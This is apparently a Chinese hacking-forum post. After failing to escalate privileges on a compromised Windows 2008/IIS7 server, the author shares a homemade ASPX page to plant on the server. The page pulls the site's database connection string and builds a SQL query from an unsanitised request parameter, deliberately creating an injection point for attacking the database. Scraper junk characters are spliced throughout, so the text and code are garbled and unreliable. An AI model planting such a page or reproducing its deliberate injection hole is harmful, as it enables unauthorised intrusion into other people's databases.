昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。9 _9 F6 H$ K* D; p4 Z
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
6 s+ `6 v: q2 F- T p7 z& p9 q- T+ ?代码量不多,自己写个拉倒了。烦死了。1 | F- S: c- P" ]4 E V6 r) B' l
6 I5 q2 C) {- E! w2 e4 A, u" d
: c; p1 w+ o T, X<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
0 _+ m. ~1 U: R7 z" q<html xmlns="http://www.w3.org/1999/xhtml">+ V: C) a) j* F" z
<head runat="server">
5 o: ~: J) r; P: h/ j; r' Y0 x <title>暗影aspx构造注射专用页面</title>3 j, I3 o5 m/ o% P, {- k
</head>
2 P; ]+ h4 p5 e1 l' K8 m2 ]<body>: i0 r" |& E9 U4 Q
<form id="form1" runat="server">7 d8 o- S" x8 q9 Q" G& u
<div>- }+ Q# p0 y" K
<script language="c#" runat="server">
( U2 z5 w/ Q* W( a2 \1 A" o' | 7 W" y* A0 q7 |' ]
void page_init(object sender, EventArgs e)
5 B6 ^' T0 t, l' N {
# M- e4 B* a2 {4 g
: G; J# D: Y" s6 | System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
5 ?& f# t5 y9 h2 ~) ]& C8 T9 _1 S
$ g+ z3 L/ R2 \ conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();- f6 I" b, T/ A4 J5 x
conn.Open();
$ R- x0 B0 J$ H! \6 t/ J7 |* u % I. ]; C2 g; j& S6 n+ B! I
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
( B" X9 X3 Y0 _# T y! R
, \) v* G+ g; K8 [ System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
$ Q1 j9 s/ H7 r8 H) z5 E M. w int x = command.ExecuteNonQuery();
) z6 z* i9 e; A8 U2 ~& G/ r Response.Write(i+"\n");
$ w. D/ _1 m! H' v Response.Write(x);
3 X5 I; d# R' g conn.Close();
$ C: h) {' q& X1 A. M( J }
: ?1 }% Q4 ]# [" D5 j) c
* Y) s# p# ^8 w6 j$ |2 k$ J </script>8 w- v+ |! W2 @. q* A
</div>6 W/ n: ]; J+ K3 w3 g% h- v2 q$ B
</form>% q+ R" o7 m! E y R
</body>
* Q% m% w: @- \& A5 ~6 Z) D3 H0 Z</html>
3 ]# z2 o( b" t) I |